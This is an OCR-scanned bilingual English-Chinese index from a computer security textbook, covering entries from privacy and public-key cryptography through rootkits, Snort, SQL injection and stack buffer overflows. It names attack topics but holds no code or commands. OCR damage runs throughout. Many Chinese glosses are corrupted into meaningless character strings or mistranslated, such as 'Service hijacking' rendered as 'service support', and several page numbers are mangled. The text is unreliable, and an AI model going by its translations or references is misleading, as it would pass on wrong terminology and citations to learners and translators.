personal (私人 )，590 
United States Privacy Act (美国 隐私 法 案 )，59] 
Private cloud (私有 云 )，428 
Private key ( 私 钥 )，45-48,，51-52,，405，650，656 
Privilege escalation (特权 提升 )，382 
Privilege-escalation exploits (特权 提升 漏洞 )，307 
Privilege management (特权 管理 )，135 
Privilege use (特权 使 用 )，561 
Proactive password checker (主动 口令 检查 器 )，79 
Process tracking (FEE BR), 562 
Profile-based anomaly detection (基于 轮廓 的 异常 
检测 )，260 
Program code, writing (程序 代码 ， 写 ) 
allocation and management of dynamic memory 
storage (动态 内 存 的 分 配 和 管理 )，377-378 
correct algorithm implementation ( 正确 算法 实现 )， 
374-376 
correspondence between algorithm and machine 
language (算法 和 机 融 语 言 的 一 致 )，376 
interpretation of data values (数据 值 的 翻译 ) 376377 
preventing race condition with shared memory ( 阻 
IESE ALE Se PARP FAYE), 378 
Program input (程序 输入 )，362-373 
buffer overflow (缓冲 区 溢出 )，363 
canonicalization (规范 化 )，372 
escaping meta characters ( 转 义 字符 )，371 
fuzzing (模糊 )，372-373 
interpretation of (解释 )，363-370 
multiple encodings (多 重 编码 )，371 
size of (大 小 )，363 
validating syntax (有 效 语法 )，370-372 


Programmers (程序 员 )，534 
Programming project (编程 项 目 )，736 
Program output, handling of (程序 输出 ， 处 理 )， 
391-393 
Program, writing a (程序 ， 写 )，360-361 
Propagation phase of virus (病毒 的 传播 阶段 )，189 
Protection (保护 ) 
domains (域名 )，116-117 
media (媒体 )，16 
physical and environment (物理 和 环境 )，16 
system and communications (系统 和 通信 )，17 
Protocol anomaly (协议 异常 )，308 
Protocol identifier (协议 标识 符 )，679 
Provable security (可 证 明 安 全 )，628 
Proxy 代理 ， 套 见 Gateways 
Proxy certificates (代理 认证 )，693 
Pseudonymity (化 名 )，592 
Pseudorandom function (PRF， 伪 随机 上 晒 数 )，727-729 
Pseudorandom numbers( 伪 随机 数 )，55-57 
Psychological acceptability (心理 接受 度 )，19 
Public access systems (公共 访问 系统 )，496 
Public cloud (公有 云 )，427-428 
Public-display right (公开 展示 权 )，584 
Public-key certificates ( 公 钥 认证 )，52-53 664 
Public-key encryption/cryptosystem ( 公 钥 加 密 /加 密 
AH), 45-50, 84, 205 
applications (应 用 程序 )，48，49 
asymmetric encryption algorithms ( 非 对 称 加 密 算 
法 )，49-50 
authenticated encryption (AE， 认 证 加 密 )，644-647 
authentication and/or data integrity (认证 和 数据 完 
整 性 )，46 
confidentiality (机 密 性 )，46 
Diffie-Hellman key exchange/key agreement 
(Diffie-Hellman 密 钥 交 换 / 密 钥 协议 )，625-657 
Digital Signature Standard (DSS， 数 字 签 名 标准 )， 
656-657 
elliptic curve cryptography ( ECC, EIERN 
密 )，657 
general-purpose (一 般 目 的 )，46 
HMAC, 641-644 
ingredients (成 分 ， BEAR), 45-46 
message or data authentication using (消息 或 数据 
认证 使 用 )，40，41 
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mode of operation of (操作 模式 )，46 
public-key key distribution ( 公 钥 分 发 )，45 
requirements (要 求 )，48-49 
RSA, 647-652 
secure hash functions (ZERK), 635-640 
structure (结构 )，45-47 
symmetric key exchange using (对 称 密 钥 交换 使 
用 )，53-54 
Public-key information ( 公 钥 信息 )，692 
Public-key infrastructure ( PKI， 公 和 钥 基 础 设施 )， 
694-696 
Public Key Infrastructure X.509 (PKIX， 公 钥 基 础 设 
施 X.509 )，696 
Public keys ( 公 铀 )，45-46，49-50，654，656，694 
Public-performance right (公开 表演 权 )，584 
Q 
Quality of Service (QoS) attributes (服务 质量 属性 ) 127 
Queries (#FifJ), 10, 156, 159, 160, 169, 267, 375, 
573, 694 
AS, 686 
database (数据 库 )，227 
DNS, 273, 240 
illegal/logically incorrect (非法 / 逻辑 错误 )，159 
inference and (推论 )，466，167 
piggybacked (#7), 159 
Query languages (查询 语言 )，150，154-155 
Query processor (#FiAJMbFBRE), 172 
R 
Race conditions, prevention of (竞争 条 件 ( 竞 态 条 
件 )， 预 防 )，378 
Radio-frequency Identification (RFID， 射 频 识 别 )，445 
Radix-64 ( 64 基数 )，664 
Rainbow table (彩虹 表 )，75 
Random access( 随 机 访问 )，627-628 
Random access memory (RAM， 随 机 访问 内 存 )，84 
Random delay (随机 延迟 )，652 
Random (selective) drop of an entry (随机 (选择 性 ) 
丢弃 一 个 条 目 )，246 
Random number (随机 数字 )，72，79，85，93 
Random numbers, security algorithms based on (随机 
数字 ， 安 全 算法 基于 )，55-57 
independence of (独立 性 )，55 
pseudorandom number vs.( 伪 随机 数 vs.), 56-57 
randomness of (随机 性 )，55-56 
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uniform distribution (均匀 分 布 )，55 
unpredictability of (不 可 预测 )，55 
Ransomware (勒索 软件 )，205 
Rapid elasticity (快速 伸缩 性 )，425 
Rate limiting (比率 限制 )，563 
Raw socket interface (原始 套 接 字 接口 )，229 
RBAC， 和 参见 Role-based access control 
RC4 algorithm (RC4 算法 )，620-622 
Reactive password checking (被 动 口令 检查 )，79 
Read access〈 读 访问 )，110 
Reading/report assignments (i / 报告 任务 )，737 
Read-only memory (ROM， 只 读 内 存 )，84 
Realms, Kerberos (Kerberos 域 )，55,689-690 
Real property (不 动产 )，583 
Real-time audit analysis (实时 审计 分 析 )，572 
Reasonable personal use (个 人 合理 地 使 用 )，539 
Received code (接收 代码 )，39 
Reconnaissance (侦察 )，210-211 
Record protocol (记录 协议 )，TLS，669-670 
Recover (恢复 )，9 
Recovery (恢复 )，26 
Recursive function call (递归 函数 调用 )，326 
Reference monitors (基准 监视 项 )，494 
Reflection attacks (反射 攻击 )，239-242 
Reflector attacks (反射 器 攻击 )，234，239-242 
Registration (注册 )，696 
Registration authority (RA， 注 册 机 构 )，65，696 
Registry access (注册 表 访 问 )，263 
Regular expression (正则 表达 式 )，371 
Regulations obligations (法 规 的 义务 )，530 
Reject (拒绝 )，309-310 
Relation (KH), 152-153, 382, 398, 473, 496 
Relational databases (关系 数据 库 )，151-155 
abstract model of (抽象 模型 )，153 
basic terminologies of (基本 术语 )，152 
creation of multiple tables (多 表 创 建 )，151 
elements of (JC), 152-154 
example (实例 )，152-153 
relational query language (关系 查询 语言 )，151 
structure (结构 )，151 
structured query language ( SQL， 结 构 化 查询 语 
A), 154-155 
Release of message content (消息 内 容 泄露 )，14 
Reliance on key employees (核心 员工 依赖 )，537 


Relying parties (RP, {K#i7T), 66, 138-139 
Remote code injection attack (远程 代码 注入 攻击 )，383 
Remote Procedure Call (RPC， 远 程 过 程 调用 )，271 
Remote user authentication (远程 用 户 认 证 ) 
dynamic biometric protocol (动态 生物 特征 认证 
协议 )，95 
password protocol (口令 协议 )，93-94 
static biometric protocol (静态 生物 特征 认证 协 
议 )，95 
token protocol ( 令 牌 协议 )，94-95 
Replacement stack frame ( 蔡 换 栈 帧 )，348-349 
Replay ( 重 放 )，14，55，93，96-97，102，491，656， 
688-689 
Replay attacks ( 重 放 攻 击 )，97，656 
Replay protection ( 重 放 保 护 )，454 
Repository (存储 库 )，696 
Reproduction right (复制 权 )，584 
Repudiation (抵赖 )，10-11，491 
Requests for Comments (RFC， 请 求 评论 ， 请求 注 释 ) 
Intrusion Detection Exchange Format (人 侵 检 测 交 
换 格式 )，276 
RFC 1847, 662 
RFC 2634, 661 
RFC 2828, 256 
RFC 3370, 662 
RFC 4134, 661 
RFC 5652, 662 
RFC 5750, 661 
RFC 5751, 661 
RFC 5752, 662 
RFC 4871, 664 
RFC 4949, 7, 106 
RFC 2827, 244 
Requirements (需求 )，259 
Research projects (研究 项 目 )，735 
Residual risk (残留 风险 )，497 
Resource management (资源 管理 )，135 
Resource pooling (资源 池 )，426 
Resources (资源 )，127，473，701 
Response( 啊 应 )，26，277 
Retinal biometric system (视网膜 生物 特征 认证 系 
统 )，88 
Return address defender (RAD， 返 回 地 址 保护 )，346 
Return to system call (返回 到 系统 调用 )，349-350 


Reverse engineering (3% i] LE), 586 
REVOKE command (REVOKE m), 162-163 
Rights holders (权限 拥有 者 )，588 
Rijndael, 35 
Risk (KU), 8, 9, 472 
acceptance (f%*%), 479-480 
analysis (分 析 )，362 
appetite (faif), 471 
avoidance (规避 )，480 
consequences (影响 )，476-477 
high level (高 级 别 )，69 
index (指数 )，469 
likelihood (可 能 性 )，475 
low level (低级 别 )，68 
moderate level (中 等 级 别 )，69 
register (登记 )，477-478 
transfer (转移 )，480 
treatment (处 置 )，479-480 
Risk assessment (风险 评估 )，17 
digital user authentication (数字 用 户 认 证 )，67-70 
of systems (系统 )，496 
Rivest, Ron, 49, 647 
Rlogin (远程 登录 )，271 
Robust filtering GREM YE), 562 
Robust Security Network (RSN， 强 健 安全 网 络 )，715 
RockYou file (RockYou 文件 )，77 
Role (A6), 123 
Role-based access control (RBAC， 基 于 角色 的 访问 
控制 )，109，120-126，442 
access control matrix (访问 控制 矩阵 )，122 
for a bank (银行 )，140-142 
base model (基准 模型 )，124 
cardinality (基数 )，126 
constraints (约束 )，125-126 
of database (数据 库 )，164-166 
key elements (要 素 )，121 
many-to-many relationships between users and roles 
(用 户 和 角色 间 的 多 对 多 关系 )，124 
matrix representation of (矩阵 表示 )，121 
mutually exclusive roles ( 互 斥 角色 )，126 
non-overlapping permissions ( 非 重 又 权限 )，126 
prerequisites (先决 条 件 )，126 
reference models (参考 模型 )，123-124 
relationship of users to roles (用 户 角 色 关 系 )，120 
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role-hierarchies (角色 层次 )，124-125 
Role-based security (基于 角色 的 安全 )，452-453 
Role constraints (角色 约束 )，125 
Role hierarchies (角色 层次 )，124-125 
Roles (角色 ) 
fixed database (固定 数据 库 )，165 
fixed server (固定 服务 器 )，165 
hierarchies (层次 )，125 
RBAC (基于 角色 的 访问 控制 )，120-126，164-166 
relative to IT systems (相对 于 IT 系统 )，530 
user-defined (FAP AZ), 165-166 
Root ( 根 ) 22-23, 129, 185, 200, 212, 219, 254, 307, 
339-341, 351, 380, 383, 389, 409-410, 557, 
564, 557, 564, 654, 694 
Rootkits, 185, 211-214 
Blue Pill (2H ), 214 
characteristics of (特性 )，212 
countermeasures (Xf), 219 
definition (€X), 212 
external mode (外 部 模式 )，212 
kernel mode (内 核 模 式 )，212 
memory-based (基于 内 存 )，212 
persistent store code (持久 性 存储 代码 )，212 
system-level call attacks (系统 级 调用 攻击 )，213 
user mode (用 户 模 式 )，212 
virtual machine and (虚拟 机 )，213-214 
Rotated XOR (RXOR, ， 循 环 异 或 )，636 
RSA public-key encryption algorithm (RSA ZS 4H Jill 
密 算 法 )，647-649 
description (H38), 647-649 
factoring problem for ( 因 式 分 解 问题 )，650-651 
timing attacks and (时 序 攻 击 )，651-652 
Rsh, 271 
Rule-based anomaly detection (基于 规则 的 异常 检 
测 )，260-261 
Rule-based heuristic identification (基于 规则 的 启发 
式 识别 )，262 
Rule-based penetration identification (基于 规则 的 渗 
透 识 别 )，262 
Rules, The (规则 )，601 
Run-time defenses (运行 时 防御 )，346-348 
Run-time environment for application auditing (应 用 
程序 审计 的 运行 时 环境 )，570 
Run-time prevention techniques (运行 时 阳 源 技术 )，161 
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S 
Safe coding techniques (安全 编码 技术 )，343-345 
Safeguard (防护 )，6，465，489-497 
Safe libraries (安全 库 )，345 
Safe temporary file use (安全 临时 文件 使 用 )，388-390 
Saffir/Simpson Hurricane Scale ( 萨 菲 尔 - F É FENG 
风 等 级 )，510 
Salt value ( 盐 值 ),，72，74-76 
San Diego Supercomputer Center (圣地 亚 哥 超级 计 
算 机 中 心 )，308 
Sanitized data (净化 数据 )，370 
S-box (S 4), 613, 616 
Scalability issues (可 伸缩 性 问题 )，496 
Scanning attack (扫描 攻击 )，272 
Screening router (BERCH HH #8), 306 
Scripting viruses (脚本 病毒 )，190-191 
Script-kiddies (脚本 小 子 )，253 
Sdrop (ja EFF), 310 
Search, access to (搜索 ， 接 人 )，110 
Second-generation scanner (第 二 代 扫 描 器 )，216 
Second-order injection (二 阶 注 和信 )，158 
Second preimage resistant hash function (第 二 抗原 象 
散 列 函数 )，43 
Secret key( 密 钥 ， 秘 密 密 钥 )，606 
authentication (认证 )，41-42 
public-key encryption( 公 和 钥 加 密 )，45-46 
symmetric encryption (对 称 加 密 )，32 
Secure analytics, visibility control (安全 分 析 ， 可 见 
性 控制 )，454 
Secure electronic transactions(SET， 安 全 电子 交易 )， 
641, 692 
Secure file shredding program (安全 文件 粉碎 程序 )， 
385-386 
Secure Hash Algorithm (SHA， 安 全 散 列 算法 )，44， 
637-640 
Secure hash functions ( SHF, ZERAX), 
42-44, 635-637 
applications (应 用 )，44-45 
requirements (需求 )，43 
strength of (强度 )，44 
Secure key delivery (安全 密 钥 交付 )，721 
Secure/Multipurpose Internet Mail Extension 
(S/MIME， 安 全 /多 用 途 Intemet 邮件 扩展 )， 
53, 661-664, 692 


enveloped data (封装 数据 )，664 
public-key certificates ( 公 钥 证 书 )，664 
signed and clear-signed data (签名 和 透明 签名 的 
数据 )，663-664 
Secure programming (安全 编程 )，360 
Secure Shell (SSH， 安 全 的 Shell), 53 
connections (连接 )，390 
Secure sockets layer (SSL， 安 全 套 接 层 )， 
Alert Protocol (警报 协议 )，668，670 
architecture (体系 结构 )，668-669 
Change Cipher Spec Protocol (变更 密码 标准 协 
议 )，670-672 
Handshake Protocol (握手 协议 )，673 
Record Protocol (记录 协议 )，668 
Securing virtualization systems (保护 虚拟 化 系 
统 )，418-419 
Security as a service (SecaaS， 安 全 即 服 务 )，438 
Security assessments (安全 评估 )，16，441 
Security association (SA， 安 全 关联 )，679 
Security attack (安全 攻击 )，9，14，19，22，25 
Security auditing (安全 审计 ) 
anomaly detection and (异常 检测 )，552 
at application-level (在 应 用 层 )，565 
application-level audit trails (应 用 层 审 计 迹 )， 
556-557 
architecture (体系 结构 )，550-554 
audit data analysis (审计 数据 分 析 )，572-574 
audit review (审计 复核 )，572 
audit trail analysis (审计 迹 分 析 )，570-574 
baselining (基线 设置 )，573 
choice of data to collect (收集 数据 选择 )，554-556 
functions (功能 )，551-552 
implementation guidelines (实施 准则 )，554 
implementing the logging function (实现 日 志 记 录 
功能 )，559-570 
involving DHCP (涉及 DHCP), 573 
physical access audit trails (物理 访问 审计 迹 )，558 
protecting audit trail data (保护 审计 迹 数 据 )，558 
requirements for (要 求 )，552-554 
security information and event management (SIEM , 
安全 信息 和 事件 管理 )，574-575 
at system level (R), 558-591 
system-level audit trails (系统 级 审计 迹 )，556 
terminology (术语 )，549 


timing (EHT), 571-572 
UNIX OS (UNIX 操作 系统 )，562-563 
user-level audit trail (用 户 级 审计 迹 )，557 
Windows OS ( Windows 操作 系统 )，561-562 
Security audit trail (安全 审计 迹 )，5$51 
Security awareness (安全 意识 )，530-534 
program (程序 )，499 
training (培训 )，499 
Security basics and literacy category (安全 知识 和 素 
养 范畴 )，530-534 
Security compliance (安全 合 规 )，500 
Security controls (安全 控制 )，474 
Security education (安全 教育 )，535 
experience (经 验 )，530 
Security education (SEED) projects (EAA (种子) 
项 目 )，733-735 
design and implementation labs (设计 和 实施 )，734 
exploration labs (探索 实验 室 )，734 
vulnerability and attack labs (漏洞 和 攻击 实验 
室 )，733 
Security/encryption (安全 /加密 )，588 
Security implementation (安全 实施 )，25-26 
case study (案例 学 习 )，502-505 
change and configuration management (变更 与 配 
FE), 500-501 
compliance (4 #il), 501 
controls (safeguards) (控制 (保障))，489-497 
handling of incidents (事件 处 理 )，502 
ISO security controls (ISO 安全 控制 )，493 
maintenance (维护 )，500 
NIST security controls ( NIST 安全 控制 )，492， 
494, 495 
plans (if X!)), 498-499 
Security information and event management ( SIEM, 
安全 信息 和 事件 管理 )，275，441，574-575 
Security intrusion (安全 人 侵 )，256 
Security maintenance, process of (安全 维护 ， 处 理 )， 
406-407 
Security manager (安全 管理 )，25 
Security mechanism (安全 机 制 )，6-7，19-21，26 
Security of the auditing function (审计 功能 的 安全 
性 )，554 
Security parameter index ( SPI， 安 全 参数 索引 )， 
679, 680 


569 


Security policy (ZER), 8, 24-25, 277, 464 
violation (违例 )，24 
Security reports (安全 报告 )，551 
Security risk assessment (安全 风险 评估 ) 
asset identification (资产 识别 )，471-472 
baseline approach (基线 方法 )，466-467 
case study of (案例 学 习 )，480-485 
combined approach (综合 的 方法 )，468 
context establishment (情景 建立 )，470-471 
detailed risk analysis (详细 风险 分 析 )，467-468 
identif ication of threats, risks, and vulnerabilities 
(识别 威胁 、 风 险 和 漏洞 )，472-474 
informal approach ( 非 正式 的 方法 )，467 
risk analysis and evaluation (风险 分 析 和 评估 )， 
474-480 
for user authentication (用 户 身 份 认 证 )，67-70 
Security service module (SSM， 安 全 服务 模块 )，629 
Security testing (ZEW), 404, 411, 413, 586 
Security training program (安全 培训 方案 )，534 
sed program (sed 程序 )，380 
Selective drop (选择 性 丢 包 )，246 
SELECT statement (SELECT 语句 )，155 
Sensor/actuator technology (传感器 /执行 器 技术 )，444 
Sensors (传感器 )，256，279，309，444-445 
Separation of duties (职责 分 割 )，537 
Separation of privilege (权限 分 离 )，19 
Sequence counter overflow (序列 号 计数 器 溢出 )，679 
Sequence number counter (序列 号 计数 需 )，679，680 
Sequence Time-Delay Embedding (STIDE) algorithm 
(序列 时 延 舱 入 算法 )，263 
Server Message Block (SMB, ARS #HH EE), 271 
Server variables (IKI AFA), 158 
Service aggregation (服务 聚合 )，431 
Service arbitrage (服务 套利 )，431 
Service hijacking (服务 支持 )，437 
Service intermediation( 服 务 中 介 )，431 _. 
Service providers (服务 提供 者 )，136，138-139，588 
Service provision security (服务 提供 安全 )，450 
Session Initiation Protocol (SIP， 会 话 初 始 协议 )，271 
flood (E72), 236-237 
Session key (Zi 4H), 55-56, 628, 686 
Sessions (223i), 123, 126, 140, 392 
setfacl command (setfacl i), 120, 408 
SetGID permission set (SetGID 权限 设置 )，119，409 
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SetUID permission set ( SetUID 权限 设置 )，119， 
351, 409 
Shadow password file (影子 口令 文件 )，77 
Shamir, Adi, 49, 647 
Shared files, locking for software security (共享 文件 、 
软件 安全 锁定 )，387-388 
Shared libraries (共享 库 )，566 
Shared system resources (共享 系统 资源 )，387-388 
Shared technology issues (共享 技术 问题 )，436 
SHA， 参 见 Secure Hash Algorithm 
Shell, 192, 236, 339-340, 342, 346, 348, 351, 
366, 379-382, 556, 565 
Shellcode 
definition (定义 )，335 
development (发 展 )，335-339 
Shift row transformation ( 行 移 位 变换 )，616，618 
Shockwave Rider, The (震荡 波 骑士 )，194 
Short-lived certificates (短期 的 证 书 )，693 
showlen() function (showlen() 函数 )，351 
shutdown command (shutdown 命令 )，556 
Sidewinder G2 security appliance attack protections 
(响尾蛇 G2 安全 设备 攻击 防护 )，312-313 
Signal-hiding techniques (信和 号 隐藏 技术 )，703 
Signature (签名 )，692 
Signature-based detection (基于 签名 的 检测 )，160，271 
Signature or Heuristic detection (特征 或 启发 式 检 
测 )，261-262 
Signed data (签名 数据 )，662 
Simple Mail Transfer Protocol ( SMTP， 简 单 邮 件 传 
输 协 议 )，296 
Simplicity (简单 性 )，628 
Single bastion inline (JH Z AREAEPL), 306 
Single bastion T (独立 T AYRAEPL), 306 
Slashdot news aggregation site ( Slashdot 新 闻 聚 合 网 
站 ，Slashdot 新 闻 聚 合 站 点 )，244 
Slowloris, 238-239 
Smart cards (REF), 88, 89, 134 
Smart objects/embedded systems (#7 REX Z / te Ask 
AM), 452 
S/MIME (安全 /多 用 途 Internet 邮件 扩展 )，692 
SMTP (简单 邮件 传输 协议 )，271 
traffic, rule set for (通信 规则 设置 )，293 
Smurf DoS program (Smurf 拒绝 服务 攻击 程序 )，242 
Sniffing traffic〈 嗅 探 通信 流量 )，207 


SNMP (简单 网 络 管理 协议 )，271 
Snort，280-284 
architecture (体系 结构 )，280-281 
characteristics (特点 )，280 
definition (定义 )，280 
destination IP address (目的 IP 地 址 )，282 
destination port (目的 端口 )，282 
direction (77 [HJ ), 282 
implementation (实施 )，281 
meta-data rule (元 数据 规则 )，283 
non-payload rule( 非 负载 规则 )，283 
payload rule (人 负载 规则 )，283 
post-detection rule (检测 后 规则 )，283 
protocol (Hpi), 282 
rule action (规则 动作 )，281 
rules (规则 )，281-282 
source IP address ( 源 IP 地 址 )，282 
source port( 源 端口 )，282 
Snort Inline (Snort 联机 模式 )，309-310 
SNORT system (SNORT 系统 )，262 
Snowden, Edward (斯 诺 登 ， 爱 德 华 )，253 
SOCKS, 298 
Software (4k(4-), 7, 12, 169, 586 
attack surface (攻击 面 )，21 
behavior-blocking (行为 阻 断 )，218 
bugs (aR), 360 
copyrighted (版 权 )，584 
development life cycle (开发 生命 周期 )，362 
efficiency (效率 )，627 
quality (质量 )，359 
reliability (可 靠 性 )，359 
Software as a service (SaaS， 软 件 即 服 务 )，426 
Software Assurance Forum for Excellence in Code 
(SAFE-Code， 迈 向 音 越 代码 的 软件 保障 论坛 )， 
362 
Software defined networks (SDNs， 软 件 定义 网 络 )， 
417 
Software security (软件 安全 ) 
defensive programming and (防御 性 编程 ) 358-362 
issues (问题 )，358-362 
operating systems, interaction of (操作 系统 ， 交 
4), 378-390 
probability distribution of targeting specific bugs 


(针对 特定 的 错误 的 概率 分 布 )，360 


program input, handling (程序 输入 ， 处 理 )，362-373 
program output, handling (程序 输出 ， 处 理 )，391-393 
standard library functions (#RYEJE PRIX), 384-387 
systems calls (系统 调用 )，384-387 
writing safe program code (编写 安全 的 程序 代码 )， 
373-378 
Sound recordings, copyrighted (录音 制品 ， 版 权 所 
有 )，584 
Source address spoofing( 源 地 址 欺骗 )，229-230 
Source and destination transport-level address ( 源 和 
目的 传输 层 地 址 )，293 
Source routing attacks( 源 路 由 攻击 )，295 
SPAM e-mail (垃圾 邮件 )，186，202-205 
Spammer programs (垃圾 邮件 发 送 者 程序 )，185 
Spamming (W5), 207 
Spear-phishing attack ( 鱼 叉 式 网 络 钓鱼 攻击 )，210 
Special reader (特殊 的 读者 )，82 
Specific account attack (特定 账户 攻击 )，71 
Spoofing (JKR), 24, 227, 229-230, 234, 240-242, 
245, 291, 295 
sprintf() library routine ( sprint() Æ WFE, sprint) Æ 
程序 )，332 
Spyware (间谍 软件 )，185，209 
detection and removal (检测 和 清除 )，218 
payloads (有 效 载 集 )，209 
SQL-based access control (基于 SQL 的 访问 控制 )， 
162-163 
SQL-DOM, 160 
SQL injection (SQL 注入 )，3656 
SQL injection (SQLi) attack (SQL 注入 攻击 )， 
155-161, 367 
attack avenues and types (攻击 途径 和 类 型 ) 158-160 
countermeasures (对 策 )，160 
example of (示例 )，156 
injection technique (注入 技术 )，156-157 
SQL Slammer worm (SQL Slammer 蠕虫 )，198 
Stack buffer overflow( 栈 缓冲 区 洲 出 )，325-342 
example (示例 )，327-332，343-344 
vulnerabilities (Jw ), 332-335 
Stack frame ( 栈 帧 )，326 
Stackguard (EE), 345 
Stack protection mechanisms ( 推 栈 保护 机 制 ) 345346 
Stackshield, 346 
Stack smashing (Hüti), 325 
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Standard library functions (标准 库 了 图 数 )，350，384-387 
Standard of conduct (行为 准则 )，539 
Stateful inspection firewall (状态 检测 防火 墙 )，296- 
297 
Stateful matching (状态 匹配 )，308 
Stateful protocol analysis (Spa， 状 态 协 议 分 析 )，272 
State-sponsored organizations (国家 资助 的 机 构 )，253 
Statically linked libraries (静态 链接 库 )，566 
Statically linked shared libraries (静态 链接 共享 库 ) 
566 
Static biometric protocol (静态 生物 特征 识别 协议 )，95 
Statistical anomaly (统计 异常 )，308 
Statistical databases (统计 数据 库 )，13 
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